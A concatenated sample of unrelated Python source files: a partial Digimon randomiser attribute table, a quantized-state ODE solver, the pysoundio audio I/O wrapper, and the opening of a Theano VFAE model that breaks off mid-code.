name="Kuwagamon +DP",
addresses=[0x266b1a4],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Kuwagamon HP",
addresses=[0x266b1a6],
number_of_bytes=2,
min_value=Min_HP_Multiplier(900,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(900,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Kuwagamon Circle",
addresses=[0x266b1a8],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(530,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(530,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Kuwagamon Triangle",
addresses=[0x266b1c4],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(400,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(400,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Kuwagamon Cross",
addresses=[0x266b1e0],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,nature_special_modifier,champion_modifier,6),
max_value=Max_Cross_Multiplier(0,nature_special_modifier,champion_modifier,6),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Kuwagamon Cross Effect",
addresses=[0x266B39C],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Drimogemon 091
Attribute(
name="Drimogemon Element",
addresses=[0x266B40E],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 91),
max_value=Get_Element_Type(32, 2, 91),
is_little_endian=True, ),
Attribute(
name="Drimogemon +DP",
addresses=[0x266b410],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Drimogemon HP",
addresses=[0x266b412],
number_of_bytes=2,
min_value=Min_HP_Multiplier(850,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(850,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Drimogemon Circle",
addresses=[0x266b414],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(450,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(450,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Drimogemon Triangle",
addresses=[0x266b430],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(310,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(310,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Drimogemon Cross",
addresses=[0x266b44c],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(280,nature_special_modifier,champion_modifier,0),
max_value=Max_Cross_Multiplier(280,nature_special_modifier,champion_modifier,0),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Drimogemon Cross Effect",
addresses=[0x266b4d8],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Vegiemon 092
Attribute(
name="Vegiemon Element",
addresses=[0x266b54a],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 92),
max_value=Get_Element_Type(32, 2, 92),
is_little_endian=True, ),
Attribute(
name="Vegiemon +DP",
addresses=[0x266b54c],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Vegiemon HP",
addresses=[0x266b54e],
number_of_bytes=2,
min_value=Min_HP_Multiplier(810,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(810,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Vegiemon Circle",
addresses=[0x266b550],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(390,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(390,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Vegiemon Triangle",
addresses=[0x266b56c],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(270,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(270,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Vegiemon Cross",
addresses=[0x266b588],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(100,nature_special_modifier,champion_modifier,10),
max_value=Max_Cross_Multiplier(100,nature_special_modifier,champion_modifier,10),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Vegiemon Cross Effect",
addresses=[0x266b614],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Kokatorimon 093
Attribute(
name="Kokatorimon Element",
addresses=[0x266b686],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 93),
max_value=Get_Element_Type(32, | |
<reponame>amal029/eha<gh_stars>1-10
import sympy as S
import mpmath as poly
import numpy as N
class NoRealRoots(Exception):
pass
class ODE:
"""This class represents the ODEs and associated computation of time.
"""
MAX_QUANTA = 10**-3
NUM_TERMS = 5 # This should be adjustable
TRIG_FUNCS = [S.sin, S.cos, S.tan, S.cot, S.sec, S.csc]
INV_TRIG_FUNCS = [S.asin, S.acos, S.atan, S.acot, S.asec, S.acsc, S.atan2]
HYPERBOLIC_FUNCS = [S.sinh, S.cosh, S.tanh, S.coth, S.sech, S.csch]
INV_HYPERBOLIC_FUNCS = [S.asinh, S.acosh, S.atanh, S.acoth, S.asech,
S.acsch]
EXP_LOG = [S.exp, S.ln]
TRANSCEDENTAL_FUNCS = (TRIG_FUNCS + INV_TRIG_FUNCS + HYPERBOLIC_FUNCS +
INV_HYPERBOLIC_FUNCS + EXP_LOG)
def __init__(self, env, lvalue, rvalue, qorder=1, torder=1,
iterations=20, vtol=0, ttol=10**-2, taylor_expand=5,
trans_funcs=[], simplify_poly=False, half=False):
"""The quantized state order and taylor series order by default is 1.
The maximum number of back-stepping iterations is 20 be default.
The tolerance by default is 10^-2. taylor_expand gives the
number to terms that we expand transcendental function too,
default 5. Simplify the polynomial before finding roots, can
take a very long time. Usually simplification is needed if
polynomial has both a numerator and a denominator.
"""
self.env = env
self.lvalue = lvalue
self.rvalue = rvalue
self.qorder = qorder
self.torder = torder
self.iterations = iterations
self.vtol = vtol
self.ttol = ttol
ODE.NUM_TERMS = taylor_expand
ODE.TRANSCEDENTAL_FUNCS += trans_funcs
ODE.simplify_poly = simplify_poly
self.half = half
@staticmethod
# XXX:
def replace(expr, s, v):
if expr == s:
return (S.sympify(v))
elif expr.args == ():
return expr
else:
return expr.func(*[ODE.replace(a, s, v)
for a in expr.args])
# XXX: Post order traversal
@staticmethod
def taylor_expand(expr, around=0):
if expr.args is ():
return expr
args = [ODE.taylor_expand(a) for a in expr.args]
if expr.func in ODE.TRANSCEDENTAL_FUNCS:
if len(args) != 1:
raise RuntimeError('Cannot create a taylor series '
'approximation of: ', expr)
else:
# XXX: Build the polynomial for arg
coeffs = poly.taylor(expr.func, around, ODE.NUM_TERMS)
# print(coeffs)
coeffs = [(S.Mul(float(a), S.Mul(*[args[0]
for i in range(c)])))
for c, a in enumerate(coeffs)][::-1]
# print(coeffs)
return S.Add(*coeffs)
else:
return expr.func(*args)
def compute(self, init, time):
# Now init is a dictionary of all the required initial values.
slope = self.rvalue
for k in init:
slope = ODE.replace(slope, k, init[k])
slope = slope.subs('t', time)
return init[self.lvalue.args[0]] + float(slope)*time
def _delta1(self, init):
return init[self.lvalue.args[0]]
def _delta2(self, init):
# slope = ODE.replace(self.rvalue, self.lvalue.args[0], init)
slope = self.rvalue
for k in init:
slope = ODE.replace(slope, k, init[k])
t = S.Symbol('t')
return (S.Add(init[self.lvalue.args[0]],
(S.Mul(slope, (t - self.env.now)))))
def _taylor1(self, init, q, q2, quanta, count):
def is_den(x):
return (type(x) == S.Pow and x.args[1] == -1)
def compute_delta(part_poly, d, dl, quanta):
# XXX: Positive quantum, so polynomial - quanta = 0
polynomial1 = S.Add(part_poly, -quanta)
# XXX: Assumption that the time line is called "t"
# print(polynomial1)
if not ODE.simplify_poly:
polynomial1 = (polynomial1.expand().subs('t', d))
else:
polynomial1 = S.simplify(polynomial1.expand().subs('t', d))
ppoly = polynomial1
# XXX: Taking care of numerator and denominators after
# expansion.
if type(polynomial1) == S.Mul:
if not is_den(polynomial1.args[0]):
polynomial1 = polynomial1.args[0] # Get just the numerator
else:
polynomial1 = polynomial1.args[1]
# print('polynomial:', polynomial1)
# If "δ" vanishes after expansion then just return None
if (type(polynomial1) is S.Float):
return None
polynomial1 = S.Poly(polynomial1)
try:
nsoln = N.roots(polynomial1.all_coeffs())
nsoln = nsoln[N.isreal(nsoln)]
nsoln = nsoln[N.where(nsoln >= 0)]
# soln = poly.polyroots([poly.mpf(a) for
# a in polynomial1.all_coeffs()])
# print('1:', nsoln, soln)
except S.PolynomialError as e:
print('When trying to solve: ', ppoly)
raise e
# dl += [float(a) for a in soln
# if type(a) is poly.mpf and float(a) >= 0]
dl += list(nsoln)
# The second polynomial
# XXX: Negative quantum, so polynomial + quanta = 0
polynomial2 = S.Add(part_poly, quanta)
# XXX: Assumption that the time line is called "t"
if not ODE.simplify_poly:
polynomial2 = (polynomial2.expand().subs('t', d))
else:
polynomial2 = S.simplify(polynomial2.expand().subs('t', d))
ppoly = polynomial2
# print(ppoly.args[0], ppoly.args[1])
if type(polynomial2) == S.Mul:
if not is_den(polynomial2.args[0]):
polynomial2 = polynomial2.args[0] # Get just the numerator
else:
polynomial2 = polynomial2.args[1]
polynomial2 = S.poly(polynomial2)
try:
nsoln = N.roots(polynomial2.all_coeffs())
nsoln = nsoln[N.isreal(nsoln)]
nsoln = nsoln[N.where(nsoln >= 0)]
# soln = poly.polyroots([poly.mpf(a) for
# a in polynomial2.all_coeffs()])
# print('2:', nsoln, soln)
except S.PolynomialError as e:
print('When trying to solve: ', ppoly)
raise e
# dl += [float(a) for a in soln
# if type(a) is poly.mpf and float(a) >= 0]
dl += list(nsoln)
return dl
def get_d(q):
d = S.Symbol('d', positive=True, real=True)
# XXX: My rvalue can depend upon a whole vector os q's
# TODO: Convert it into a taylor series
# print(self.rvalue, q)
# XXX: Making a taylor polynomial if it is transcendental
# function
slope = ODE.taylor_expand(self.rvalue)
# print('slope: ', slope)
# print(q)
for k in q:
slope = ODE.replace(slope, k, q[k]).evalf()
# print(slope)
# XXX: IMP CHANGE! Here I am chaning QSS to compare with a
# constant level not qith "Q". Note that q is the slope
# itself.
part_poly = S.Mul(d, slope)
# print('ppoly: ', part_poly.subs('t', 'd').expand().evalf())
# XXX: compute_delta saolves for the roots of the polynomial
dl = compute_delta(part_poly, d, [], quanta)
if dl is None:
return None # The constant slope case
elif dl == []:
raise NoRealRoots('No real positive root for: ',
S.Eq(part_poly.subs('t', d).expand(),
quanta), '{:.2e}'.format(quanta))
d = min(dl)
return d
# print('getting δ1')
d1 = get_d(q) # Get the future time event from QSS-1
# print('getting δ2')
d2 = get_d(q2) # Get the future time event from modified QSS-2
if d1 is None:
return S.oo, quanta # This is returning infinity, wrong HA
if d2 is None:
# d1s = '{:.2e}'.format(d1)
# quanta = '{:.2e}'.format(quanta)
# print('chosen Δq: %s δ: %s' % (quanta, d1s))
return d1, quanta
elif abs(d1 - d2) <= self.ttol:
# d1s = '{:.2e}'.format(d1)
# d2s = '{:.2e}'.format(d2)
# pquanta = '{:.2e}'.format(quanta)
# print('chosen Δq: %s δ1: %s δ2: %s' % (pquanta, d1s, d2s))
# In this case we have satisfied εt so returning first δ
return d1, quanta
elif count < self.iterations:
# If the delta step results in output that is within the
# user defined error bounds then great. Else, half the
# quanta and keep on doing this until number of iterations
# is met. This is reducing the quanta in a geometric
# progression.
# XXX: Adaptive Stepsize Runge-Kutta Integration William H.
# Press, and <NAME>
newquanta = d1 * pow(abs(self.ttol / (d1 - d2)), 1.0/2)
quanta = newquanta if newquanta <= quanta else 0.5*quanta
return self._taylor1(init, q, q2, quanta, (count+1))
else:
raise RuntimeError('Could not find delta that satisfies '
'the user specified error bound: '
'ε: %s δ1: %s δ2: %s Q1: %s Q2: %s '
'Δq: %s. Increase interation count'
% (self.ttol, d1, d2, q, q2, quanta))
def _taylor(self, init, q, q2, quanta):
if self.torder == 1: # First order taylor only supported
# The delta step
return self._taylor1(init, q, q2, quanta, 0)
elif self.torder > 1:
raise RuntimeError('Currently only first order taylor supported')
def get_q(self, init, order):
# First calculate the q(t) given the qorder
if order == 1:
q = self._delta1(init)
elif order == 2:
q = self._delta2(init)
elif order > 2:
raise RuntimeError('Curretly only upto QSS2 is supported')
return q
# XXX: This is the main function, which returns the future time
# event per level crossing per variable.
def delta(self, init, other_odes=None, quanta=MAX_QUANTA):
"""This is the main function that returns back the delta step-size.
Arguments: The initial value of the ode. Returns: The delta
step-size that is within the user specified error.
"""
# These two are me XXX: Here we are building the quantized
# states, i.e., hysterisis for qorder=1 and integration for
# qorder-2.
qs = {self.lvalue.args[0]: self.get_q(init, self.qorder)}
q2s = {self.lvalue.args[0]: self.get_q(init, self.qorder+1)}
# XXX: Building the quantized states for other odes that we
# might depend upon, because we can have coupled ODEs.
if other_odes is not None:
for ode in other_odes:
qs[ode.lvalue.args[0]] = ode.get_q(init, ode.qorder)
q2s[ode.lvalue.args[0]] = ode.get_q(init, ode.qorder+1)
# XXX: delta is the returned value
delta, nquanta = self._taylor(init, qs, q2s, quanta)
# XXX: Handling sudden jumps
if self.half and | |
# -*- coding: utf-8 -*-
"""
pysoundio.py
Play and Record Sound in Python using libsoundio
libsoundio is a C library for cross-platform audio input and output.
It is suitable for real-time and consumer software.
"""
import logging
import threading
import time
from pysoundio._soundio import ffi as _ffi
from pysoundio._soundio import lib as _lib
from pysoundio import constants
class PySoundIoError(Exception):
pass
class _InputProcessingThread(threading.Thread):
def __init__(self, parent, *args, **kwargs):
super().__init__(*args, **kwargs)
self.buffer = parent.input['buffer']
self.callback = parent.input['read_callback']
self.bytes_per_frame = parent.input['bytes_per_frame']
self.daemon = True
self.running = True
self.start()
def run(self):
"""
When there is data ready in the input buffer,
pass it to the user callback.
"""
while self.running:
fill_bytes = _lib.soundio_ring_buffer_fill_count(self.buffer)
if fill_bytes > 0:
read_buf = _lib.soundio_ring_buffer_read_ptr(self.buffer)
data = bytearray(fill_bytes)
_ffi.memmove(data, read_buf, fill_bytes)
if self.callback:
self.callback(data=data, length=int(fill_bytes / self.bytes_per_frame))
_lib.soundio_ring_buffer_advance_read_ptr(self.buffer, fill_bytes)
time.sleep(0.001)
def stop(self):
self.running = False
class _OutputProcessingThread(threading.Thread):
def __init__(self, parent, *args, **kwargs):
super().__init__(*args, **kwargs)
self.buffer = parent.output['buffer']
self.callback = parent.output['write_callback']
self.bytes_per_frame = parent.output['bytes_per_frame']
self.sample_rate = parent.output['sample_rate']
self.block_size = parent.output['block_size']
self.to_read = 0
self.running = True
self.daemon = True
self.start()
def run(self):
"""
Request output data from user callback when there is
free space in the buffer.
"""
while self.running:
if self.to_read > 0:
data = bytearray(self.block_size * self.bytes_per_frame)
free_bytes = _lib.soundio_ring_buffer_free_count(self.buffer)
if free_bytes > len(data):
if self.callback:
self.callback(data=data, length=self.block_size)
write_buf = _lib.soundio_ring_buffer_write_ptr(self.buffer)
_ffi.memmove(write_buf, data, len(data))
_lib.soundio_ring_buffer_advance_write_ptr(self.buffer, len(data))
with threading.Lock():
self.to_read -= 1
time.sleep(0.001)
def stop(self):
self.running = False
class PySoundIo:
def __init__(self, backend=None):
"""
Initialise PySoundIo.
Connect to a specific backend, or the default.
Parameters
----------
backend: (SoundIoBackend) see `Backends`_. (optional)
"""
self.backend = backend
self.input = {'device': None, 'stream': None, 'buffer': None, 'read_callback': None, 'thread': None}
self.output = {'device': None, 'stream': None, 'buffer': None, 'write_callback': None, 'thread': None}
self.logger = logging.getLogger(__name__)
self._soundio = _lib.soundio_create()
if not self._soundio:
raise PySoundIoError('Out of memory')
if backend:
self._check(_lib.soundio_connect_backend(self._soundio, backend))
else:
self._check(_lib.soundio_connect(self._soundio))
self._userdata = _ffi.new_handle(self)
self.flush()
def close(self):
"""
Clean up allocated memory
Close libsoundio connections
"""
self.logger.info('Closing down threads...')
if self.input['thread']:
self.input['thread'].stop()
while self.input['thread'].is_alive():
time.sleep(0.001)
if self.output['thread']:
self.output['thread'].stop()
while self.output['thread'].is_alive():
time.sleep(0.001)
self.logger.info('Closing down streams...')
if self.input['stream']:
_lib.soundio_instream_destroy(self.input['stream'])
del self.input['stream']
if self.output['stream']:
_lib.soundio_outstream_destroy(self.output['stream'])
del self.output['stream']
if self.input['buffer']:
_lib.soundio_ring_buffer_destroy(self.input['buffer'])
del self.input['buffer']
if self.output['buffer']:
_lib.soundio_ring_buffer_destroy(self.output['buffer'])
del self.output['buffer']
if self.input['device']:
_lib.soundio_device_unref(self.input['device'])
del self.input['device']
if self.output['device']:
_lib.soundio_device_unref(self.output['device'])
del self.output['device']
if self._soundio:
_lib.soundio_disconnect(self._soundio)
_lib.soundio_destroy(self._soundio)
del self._soundio
def flush(self):
"""
Atomically update information for all connected devices.
"""
_lib.soundio_flush_events(self._soundio)
@property
def version(self):
"""
Returns the current version of libsoundio
"""
return _ffi.string(_lib.soundio_version_string()).decode()
def _check(self, code):
"""
Returns an error message associated with the return code
"""
if code != _lib.SoundIoErrorNone:
raise PySoundIoError(_ffi.string(_lib.soundio_strerror(code)).decode())
@property
def backend_count(self):
"""
Returns the number of available backends.
"""
return _lib.soundio_backend_count(self._soundio)
def get_default_input_device(self):
"""
Returns default input device
Returns
-------
PySoundIoDevice input device
Raises
------
PySoundIoError if the input device is not available
"""
device_id = _lib.soundio_default_input_device_index(self._soundio)
return self.get_input_device(device_id)
def get_input_device(self, device_id):
"""
Return an input device by index
Parameters
----------
device_id: (int) input device index
Returns
-------
PySoundIoDevice input device
Raises
------
PySoundIoError if an invalid device id is used, or device is unavailable
"""
if device_id < 0 or device_id > _lib.soundio_input_device_count(self._soundio):
raise PySoundIoError('Invalid input device id')
self.input['device'] = _lib.soundio_get_input_device(self._soundio, device_id)
return self.input['device']
def get_default_output_device(self):
"""
Returns default output device
Returns
-------
PySoundIoDevice output device
Raises
------
PySoundIoError if the output device is not available
"""
device_id = _lib.soundio_default_output_device_index(self._soundio)
return self.get_output_device(device_id)
def get_output_device(self, device_id):
"""
Return an output device by index
Parameters
----------
device_id: (int) output device index
Returns
-------
PySoundIoDevice output device
Raises
------
PySoundIoError if an invalid device id is used, or device is unavailable
"""
if device_id < 0 or device_id > _lib.soundio_output_device_count(self._soundio):
raise PySoundIoError('Invalid output device id')
self.output['device'] = _lib.soundio_get_output_device(self._soundio, device_id)
return self.output['device']
def list_devices(self):
"""
Return a list of available devices
Returns
-------
(list)(dict) containing information on available input / output devices.
"""
output_count = _lib.soundio_output_device_count(self._soundio)
input_count = _lib.soundio_input_device_count(self._soundio)
default_output = _lib.soundio_default_output_device_index(self._soundio)
default_input = _lib.soundio_default_input_device_index(self._soundio)
input_devices = []
output_devices = []
for i in range(0, input_count):
device = _lib.soundio_get_input_device(self._soundio, i)
input_devices.append({
'id': _ffi.string(device.id).decode(),
'name': _ffi.string(device.name).decode(),
'is_raw': device.is_raw,
'is_default': default_input == i,
'sample_rates': self.get_sample_rates(device),
'formats': self.get_formats(device),
'layouts': self.get_layouts(device),
'software_latency_min': device.software_latency_min,
'software_latency_max': device.software_latency_max,
'software_latency_current': device.software_latency_current,
'probe_error': PySoundIoError(
_ffi.string(_lib.soundio_strerror(device.probe_error)).decode()
if device.probe_error else None)
})
_lib.soundio_device_unref(device)
for i in range(0, output_count):
device = _lib.soundio_get_output_device(self._soundio, i)
output_devices.append({
'id': _ffi.string(device.id).decode(),
'name': _ffi.string(device.name).decode(),
'is_raw': device.is_raw,
'is_default': default_output == i,
'sample_rates': self.get_sample_rates(device),
'formats': self.get_formats(device),
'layouts': self.get_layouts(device),
'software_latency_min': device.software_latency_min,
'software_latency_max': device.software_latency_max,
'software_latency_current': device.software_latency_current,
'probe_error': PySoundIoError(
_ffi.string(_lib.soundio_strerror(device.probe_error)).decode()
if device.probe_error else None)
})
_lib.soundio_device_unref(device)
self.logger.info('%d devices found' % (input_count + output_count))
return (input_devices, output_devices)
def get_layouts(self, device):
"""
Return a list of available layouts for a device
Parameters
----------
device: (SoundIoDevice) device object
Returns
-------
(dict) Dictionary of available channel layouts for a device
"""
current = device.current_layout
layouts = {
'current': {
'name': _ffi.string(current.name).decode() if current.name else 'None'
},
'available': []
}
for idx in range(0, device.layout_count):
layouts['available'].append({
'name': (_ffi.string(device.layouts[idx].name).decode() if
device.layouts[idx].name else 'None'),
'channel_count': device.layouts[idx].channel_count
})
return layouts
def get_sample_rates(self, device):
"""
Return a list of available sample rates for a device
Parameters
----------
device: (SoundIoDevice) device object
Returns
-------
(dict) Dictionary of available sample rates for a device
"""
sample_rates = {'current': device.sample_rate_current, 'available': []}
for s in range(0, device.sample_rate_count):
sample_rates['available'].append({
'min': device.sample_rates[s].min,
'max': device.sample_rates[s].max
})
return sample_rates
def get_formats(self, device):
"""
Return a list of available formats for a device
Parameters
----------
device: (SoundIoDevice) device object
Returns
-------
(dict) Dictionary of available formats for a device
"""
formats = {'current': device.current_format, 'available': []}
for r in range(0, device.format_count):
formats['available'].append(constants.FORMATS[device.formats[r]])
return formats
def supports_sample_rate(self, device, rate):
"""
Check the sample rate is supported by the selected device.
Parameters
----------
device: (SoundIoDevice) device object
rate (int): sample rate
Returns
-------
(bool) True if sample rate is supported for this device
"""
return bool(_lib.soundio_device_supports_sample_rate(device, rate))
def get_default_sample_rate(self, device):
"""
Get the best sample rate.
Parameters
----------
device: (SoundIoDevice) device object
Returns
-------
(int) The best available sample rate
"""
sample_rate = None
for rate in constants.PRIORITISED_SAMPLE_RATES:
if self.supports_sample_rate(device, rate):
sample_rate = rate
break
if not sample_rate:
sample_rate = device.sample_rates.max
return sample_rate
def supports_format(self, device, format):
"""
Check the format is supported by the selected device.
Parameters
----------
device: (SoundIoDevice) device object
format: (SoundIoFormat) see `Formats`_.
Returns
-------
(bool) True if the format is supported for this device
"""
return bool(_lib.soundio_device_supports_format(device, format))
def get_default_format(self, device):
"""
Get the best format value.
Parameters
----------
device: (SoundIoDevice) device object
Returns
------
(SoundIoFormat) The best available format
"""
dtype = _lib.SoundIoFormatInvalid
for fmt in constants.PRIORITISED_FORMATS:
if self.supports_format(device, fmt):
dtype = fmt
break
if dtype == _lib.SoundIoFormatInvalid:
raise PySoundIoError('Incompatible sample formats')
return dtype
def sort_channel_layouts(self, device):
"""
Sorts channel layouts by channel count, descending
Parameters
----------
device: (SoundIoDevice) device object
"""
_lib.soundio_device_sort_channel_layouts(device)
def _get_default_layout(self, channels):
"""
Get default builtin channel layout for the given number of channels
Parameters
----------
channel_count: (int) desired number of channels
"""
return _lib.soundio_channel_layout_get_default(channels)
def get_bytes_per_frame(self, format, channels):
"""
Get the number of bytes per frame
Parameters
----------
format: (SoundIoFormat) format
channels: (int) number of channels
Returns
-------
(int) number of bytes per frame
"""
return _lib.soundio_get_bytes_per_sample(format) * channels
def get_bytes_per_sample(self, format):
"""
Get the number of bytes per sample
Parameters
----------
format: (SoundIoFormat) format
Returns
-------
(int) number of bytes per sample
"""
return _lib.soundio_get_bytes_per_sample(format)
def get_bytes_per_second(self, format, channels, sample_rate):
"""
Get the number of bytes per second
Parameters
----------
format: (SoundIoFormat) format
channels (int) number of channels
sample_rate (int) sample rate
Returns
-------
(int) number of bytes per second
"""
return self.get_bytes_per_frame(format, channels) * sample_rate
def _create_input_ring_buffer(self, capacity):
"""
Creates ring buffer with the capacity to hold 30 seconds of data,
by default.
"""
self.input['buffer'] = _lib.soundio_ring_buffer_create(self._soundio, capacity)
return self.input['buffer']
def _create_output_ring_buffer(self, capacity):
"""
Creates ring buffer with the capacity to hold 30 seconds of data,
by default.
"""
self.output['buffer'] = _lib.soundio_ring_buffer_create(self._soundio, capacity)
return self.output['buffer']
def _create_input_stream(self):
"""
Allocates memory and sets defaults for input stream
"""
self.input['stream'] = _lib.soundio_instream_create(self.input['device'])
if not self.input['stream']:
raise PySoundIoError('Out of memory')
self.input['stream'].userdata = self._userdata
self.input['stream'].read_callback = _lib._read_callback
self.input['stream'].overflow_callback = _lib._overflow_callback
self.input['stream'].error_callback = _lib._input_error_callback
layout = self._get_default_layout(self.input['channels'])
if | |
<reponame>MistSC/kaldi-pdnn-nctu-mllab<filename>run_timit/svae/VFAE.py<gh_stars>1-10
from __future__ import print_function
from collections import OrderedDict
import os
import sys
import timeit
import scipy.io as sio
import numpy as np
import theano
import theano.tensor as T
import nnet as nn
import criteria as er
import util
################################################################################################################
################################################################################################################
'''Model Definition/Construct'''
class VFAE(object):
"""
The semi-supervised model Domain-Adversial Variational Autoencoder
To deal with the semi-supervised model that source, target domain data will walk though same path. Use shared layer idea by copy the weight
The domain label s will constuct inside this class
For abbreviation: HL refer to hiddenlayer, GSL refer to Gaussian Sample Layer, CSL refer to Cat Sample Layer
Encoder refer to Encoder NN, Decoder refer to Decoder NN
"""
def __init__(self, rng, input_source, input_target, label_source, batch_size,
encoder1_struct, encoder2_struct, encoder3_struct, decoder1_struct, decoder2_struct, alpha, beta, D):
"""Initialize the parameters for the multilayer perceptron
:type rng: numpy.random.RandomState
:param rng: a random number generator used to initialize weights
:type input_source: theano.tensor.TensorType
:param input: symbolic variable that describes the "Source Domain" input of the architecture (one minibatch)
:type input_target: theano.tensor.TensorType
:param input: symbolic variable that describes the "Target Domain" input of the architecture (one minibatch)
:type xxx_struct: class NN_struct
:param xxx_strucat: define the structure of each NN
"""
#------------------------------------------------------------------------
#Encoder 1 Neural Network: present q_\phi({z_y}_n | x_n, d_n)
d_source = T.zeros([batch_size,1], dtype=theano.config.floatX)
xd_source = T.concatenate([input_source, d_source], axis=1)
d_target = T.ones([batch_size,1], dtype=theano.config.floatX)
xd_target = T.concatenate([input_target, d_target], axis=1)
self.Encoder1_mu = nn.NN_Block_0L(
rng=rng,
input_source=xd_source,
input_target=xd_target,
struct = encoder1_struct,
name='Encoder1_mu'
)
self.Encoder1_sigma = nn.NN_Block_0L(
rng=rng,
input_source=xd_source,
input_target=xd_target,
struct = encoder1_struct,
name='Encoder1_sigma'
)
#Sample layer
self.EC_1_GSL_source = nn.GaussianSampleLayer(
mu=self.Encoder1_mu.output_source,
log_sigma=self.Encoder1_sigma.output_source,
n_in = encoder1_struct.layer_dim[-1],
batch_size = batch_size
)
self.EC_1_GSL_target = nn.GaussianSampleLayer(
mu=self.Encoder1_mu.output_target,
log_sigma=self.Encoder1_sigma.output_target,
n_in = encoder1_struct.layer_dim[-1],
batch_size = batch_size
)
zy_dim = encoder1_struct.layer_dim[-1]
self.EC_zy_S_mu = self.Encoder1_mu.output_source
self.EC_zy_S_log_sigma = self.Encoder1_sigma.output_source
self.EC_zy_S_sigma = T.exp(self.EC_zy_S_log_sigma)
self.EC_zy_T_mu = self.Encoder1_mu.output_target
self.EC_zy_T_log_sigma = self.Encoder1_sigma.output_target
self.EC_zy_T_sigma = T.exp(self.EC_zy_T_log_sigma)
self.zy_S = self.EC_1_GSL_source.output
self.zy_T = self.EC_1_GSL_target.output
self.Encoder1_params = self.Encoder1_mu.params + self.Encoder1_sigma.params
#self.Encoder1_outputs = [("EC_zy_S_mu", self.EC_zy_S_mu), ("EC_zy_S_log_sigma", self.EC_zy_S_log_sigma), ("zy_S", self.zy_S),
# ("EC_zy_T_mu", self.EC_zy_T_mu), ("EC_zy_T_log_sigma", self.EC_zy_T_log_sigma), ("zy_T", self.zy_T)]
self.Encoder1_outputs = [self.EC_zy_S_mu, self.EC_zy_S_log_sigma, self.zy_S, self.EC_zy_T_mu, self.EC_zy_T_log_sigma, self.zy_T]
self.Encoder1_outputs_name = ["EC_zy_S_mu", "EC_zy_S_log_sigma", "zy_S", "EC_zy_T_mu", "EC_zy_T_log_sigma", "zy_T"]
#------------------------------------------------------------------------
#Encoder 3 Neural Network: present q_\phi(y_n | {z_1}_n)
self.Encoder3_pi = nn.NN_Block_0L(
rng=rng,
input_source=self.zy_S,
input_target=self.zy_T,
struct = encoder3_struct,
name='Encoder3_pi'
)
#Sample layer
self.EC_3_CSL_target = nn.CatSampleLayer(
pi=self.Encoder3_pi.output_target,
n_in = encoder3_struct.layer_dim[-1],
batch_size = batch_size
)
y_dim = encoder3_struct.layer_dim[-1]
self.EC_y_S_pi = self.Encoder3_pi.output_source
self.EC_y_T_pi = self.Encoder3_pi.output_target
self.y_T = self.EC_3_CSL_target.output
self.Encoder3_params = self.Encoder3_pi.params
#self.Encoder3_outputs = [("EC_y_S_pi",self.EC_y_S_pi), ("EC_y_T_pi",self.EC_y_T_pi), ("y_T",self.y_T)]
self.Encoder3_outputs = [self.EC_y_S_pi, self.EC_y_T_pi, self.y_T]
self.Encoder3_outputs_name = ["EC_y_S_pi", "EC_y_T_pi", "y_T"]
#------------------------------------------------------------------------
#Encoder 2 Neural Network: present q_\phi({a_y}_n | {z_y}_n, y_n)
#Input Append
zyy_source = T.concatenate([self.zy_S, label_source], axis=1)
zyy_target = T.concatenate([self.zy_T, self.y_T], axis=1)
self.Encoder2_mu = nn.NN_Block_0L(
rng=rng,
input_source=zyy_source,
input_target=zyy_target,
struct = encoder2_struct,
name='Encoder2_mu'
)
self.Encoder2_sigma = nn.NN_Block_0L(
rng=rng,
input_source=zyy_source,
input_target=zyy_target,
struct = encoder2_struct,
name='Encoder2_sigma'
)
#Sample layer
self.EC_2_GSL_source = nn.GaussianSampleLayer(
mu=self.Encoder2_mu.output_source,
log_sigma=self.Encoder2_sigma.output_source,
n_in = encoder2_struct.layer_dim[-1],
batch_size = batch_size
)
self.EC_2_GSL_target = nn.GaussianSampleLayer(
mu=self.Encoder2_mu.output_target,
log_sigma=self.Encoder2_sigma.output_target,
